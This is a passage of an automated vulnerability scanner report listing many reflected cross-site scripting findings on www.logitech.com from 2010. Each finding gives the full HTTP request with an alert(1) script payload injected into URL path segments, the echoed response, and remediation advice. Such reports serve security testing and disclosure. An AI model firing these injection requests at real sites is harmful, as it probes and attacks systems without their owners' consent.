Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dc3ea</script><script>alert(1)</script>45644b47ff3/69/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b4fa"%3b3d606340d49 was submitted in the REST URL parameter 1. This input was echoed as 2b4fa";3d606340d49 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us2b4fa"%3b3d606340d49/69/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:01:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24671</script><script>alert(1)</script>e32e808f9ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/6924671</script><script>alert(1)</script>e32e808f9ac/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ec1"><script>alert(1)</script>93edac3df17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/69c1ec1"><script>alert(1)</script>93edac3df17/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab401"><script>alert(1)</script>071028c368 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usab401"><script>alert(1)</script>071028c368/69/6029 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be5b0"%3bfcf64012248 was submitted in the REST URL parameter 1. This input was echoed as be5b0";fcf64012248 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usbe5b0"%3bfcf64012248/69/6029 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8160</script><script>alert(1)</script>08aa1f6a82b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f8160</script><script>alert(1)</script>08aa1f6a82b/69/6029 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 320c8</script><script>alert(1)</script>acb6a8e587e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/69320c8</script><script>alert(1)</script>acb6a8e587e/6029 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 795a0"><script>alert(1)</script>a8a3663df42 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/69795a0"><script>alert(1)</script>a8a3663df42/6029 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6440c</script><script>alert(1)</script>bcb073ac751 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/69/60296440c</script><script>alert(1)</script>bcb073ac751 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dcec"><script>alert(1)</script>505d1b3d931 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/69/60299dcec"><script>alert(1)</script>505d1b3d931 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fadec"><script>alert(1)</script>1d36ba86f2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usfadec"><script>alert(1)</script>1d36ba86f2c/69/7087 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b32de</script><script>alert(1)</script>0ddcb04912f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /b32de</script><script>alert(1)</script>0ddcb04912f/69/7087 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7810a"%3b83e9e6d3581 was submitted in the REST URL parameter 1. This input was echoed as 7810a";83e9e6d3581 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us7810a"%3b83e9e6d3581/69/7087 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fbc4</script><script>alert(1)</script>b64e6a0b6c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/692fbc4</script><script>alert(1)</script>b64e6a0b6c0/7087 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11345"><script>alert(1)</script>0668758263f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/6911345"><script>alert(1)</script>0668758263f/7087 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87aa2</script><script>alert(1)</script>a8b352e080f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/69/708787aa2</script><script>alert(1)</script>a8b352e080f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14710"><script>alert(1)</script>cbdfb0c7fe7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/69/708714710"><script>alert(1)</script>cbdfb0c7fe7 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c284"%3b67144e980d5 was submitted in the REST URL parameter 1. This input was echoed as 5c284";67144e980d5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us5c284"%3b67144e980d5/69/7112 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e6d</script><script>alert(1)</script>c3d1cae9b1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /60e6d</script><script>alert(1)</script>c3d1cae9b1e/69/7112 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a023c"><script>alert(1)</script>e7a924d219 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usa023c"><script>alert(1)</script>e7a924d219/69/7112 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5475c</script><script>alert(1)</script>6c91d939bb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/695475c</script><script>alert(1)</script>6c91d939bb0/7112 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 417f4"><script>alert(1)</script>fc8055af3bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/69417f4"><script>alert(1)</script>fc8055af3bc/7112 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cfb8"><script>alert(1)</script>1b9f65d1c50 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/69/71128cfb8"><script>alert(1)</script>1b9f65d1c50 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3bd7</script><script>alert(1)</script>0b52a40211d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/69/7112a3bd7</script><script>alert(1)</script>0b52a40211d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d08f"><script>alert(1)</script>122d6a4449e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us5d08f"><script>alert(1)</script>122d6a4449e/70/6054 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75333</script><script>alert(1)</script>f430c481031 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /75333</script><script>alert(1)</script>f430c481031/70/6054 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:44 GMT Connection: close
